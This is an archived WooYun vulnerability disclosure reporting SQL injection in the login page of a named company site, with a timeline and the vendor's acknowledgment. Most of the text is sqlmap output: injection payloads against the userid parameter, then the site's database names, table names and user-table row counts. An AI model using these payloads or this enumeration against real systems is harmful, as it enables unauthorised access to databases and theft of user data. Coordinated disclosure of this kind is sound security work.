乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-13: 细节已通知厂商并且等待厂商处理中 2015-07-14: 厂商已经确认,细节仅向厂商公开 2015-07-24: 细节向核心白帽子及相关领域专家公开 2015-08-03: 细节向普通白帽子公开 2015-08-13: 细节向实习白帽子公开 2015-08-28: 细节向公众公开
SQL注入
http://login.jzjt.com/login.jsp用户名输入'
抓包
http://login.jzjt.com/login.jsp?R1.x=25&R1.y=25&passwd=a&refer=%2Femail.jsp&userid=a*
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: URIParameter: #1* Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: http://login.jzjt.com:80/login.jsp?R1.x=35&R1.y=52&passwd=a&refer=email.jsp&userid=a' AND 9942=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(121)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9942=9942) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(110)+CHAR(121)+CHAR(113))) AND 'Lvht'='Lvht Type: UNION query Title: Generic UNION query (NULL) - 23 columns Payload: http://login.jzjt.com:80/login.jsp?R1.x=35&R1.y=52&passwd=a&refer=email.jsp&userid=a' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(121)+CHAR(106)+CHAR(113)+CHAR(78)+CHAR(115)+CHAR(71)+CHAR(108)+CHAR(72)+CHAR(77)+CHAR(85)+CHAR(102)+CHAR(89)+CHAR(87)+CHAR(113)+CHAR(106)+CHAR(110)+CHAR(121)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: http://login.jzjt.com:80/login.jsp?R1.x=35&R1.y=52&passwd=a&refer=email.jsp&userid=a'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: http://login.jzjt.com:80/login.jsp?R1.x=35&R1.y=52&passwd=a&refer=email.jsp&userid=a' WAITFOR DELAY '0:0:5'-----[17:12:39] [INFO] the back-end DBMS is Microsoft SQL Serverweb application technology: JSPback-end DBMS: Microsoft SQL Server 2000
当前库
web application technology: JSPback-end DBMS: Microsoft SQL Server 2000[17:13:10] [INFO] fetching current databasecurrent database: 'JzWeb'
注入点
数据库
available databases [10]:[*] JzWeb[*] lumigent[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb[*] YC_SmartCard[*] ysbx_zj
current database: 'JzWeb'
表
Database: JzWeb[277 tables]
部分表
| temp_usr || tmp_usr || usr1 || usr_dep || usr_dep || usr_func || usr_inf || usr_level || usr_mail_info || usr_roll || usr_std_level || usr_table || v_afr_log || v_cgdetail || vaframt || vendor_data || wjdc_jsp || wlb_audit || wldc2013 || wldc2013 || workflow || xjlZB || xjllb_qm || xjllb_qm || xjllb_qm |
select count(*) from acount;: '138'select count(*) from usr1;: '930'
危害等级:低
漏洞Rank:5
确认时间:2015-07-14 14:11
非常感谢发现漏洞,我公司信息人员正在处理。
暂无